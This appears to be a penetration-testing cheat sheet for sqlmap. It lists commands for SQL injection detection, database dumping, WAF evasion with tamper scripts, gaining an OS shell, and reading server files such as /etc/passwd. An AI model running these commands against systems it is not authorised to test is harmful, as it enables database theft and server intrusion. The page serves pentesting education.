nix4cyber

SQLmap

SQLmap is an open-source tool that automates the detection and exploitation of SQL Injection vulnerabilities. It is the essential tool for web penetration testing.

Basic Commands

ActionCommand
Simple testsqlmap -u $url
POST Requestsqlmap -u $url --data "username=test&password=test"
List databasessqlmap -u $url --dbs
List tablessqlmap -u $url -D $dbname --tables
List columnssqlmap -u $url -D $dbname -T $table --columns
Data Dumpsqlmap -u $url -D $dbname -T $table -C "COL1,COL2" --dump

Injection Techniques

SQLmap can use various techniques to extract data. You can specify them to refine your search.

OptionTechnique
-p "param"Specifies the vulnerable parameter to test.
--technique=BUESTOnly uses the specified techniques: Boolean-based, Union-based, Error-based, Stacked queries, Time-based.
--level=3Sets the aggression level of the test (1 to 5). A higher level tests more parameters (Headers, Cookies, etc.).
--risk=3Sets the risk of the injected payload (1 to 3). A higher risk may involve writing to the DB.
--os-shellAttempts to gain an interactive Operating System shell (if privileges allow).
--cookie "SESSION=..."Injects a cookie to maintain the session state.
--random-agentUse a random HTTP User-Agent header from a list to evade simple bot detection based on fixed User-Agents.

WAF Evasion

SQLmap offers tamper scripts to automatically obfuscate payloads, helping to bypass Web Application Firewalls (WAFs) and basic filtering mechanisms.

sqlmap -u $url --tamper=SCRIPT
See most used tamper scripts
ScriptDescription
space2commentreplaces spaces with /**/
unionalltostackedsquerieschanges UNION ALL structure
apostrophemaskobfuscates apostrophes

File Access

⚠️ Requires a user with sufficient privileges (e.g., FILEprivilege).

ActionCommand
Read a filesqlmap -u $url --file-read "/etc/passwd"
Write a filesqlmap -u $url --file-write "/tmp/localFile" --file-dest "/path/to/remote"

SQLi Challenges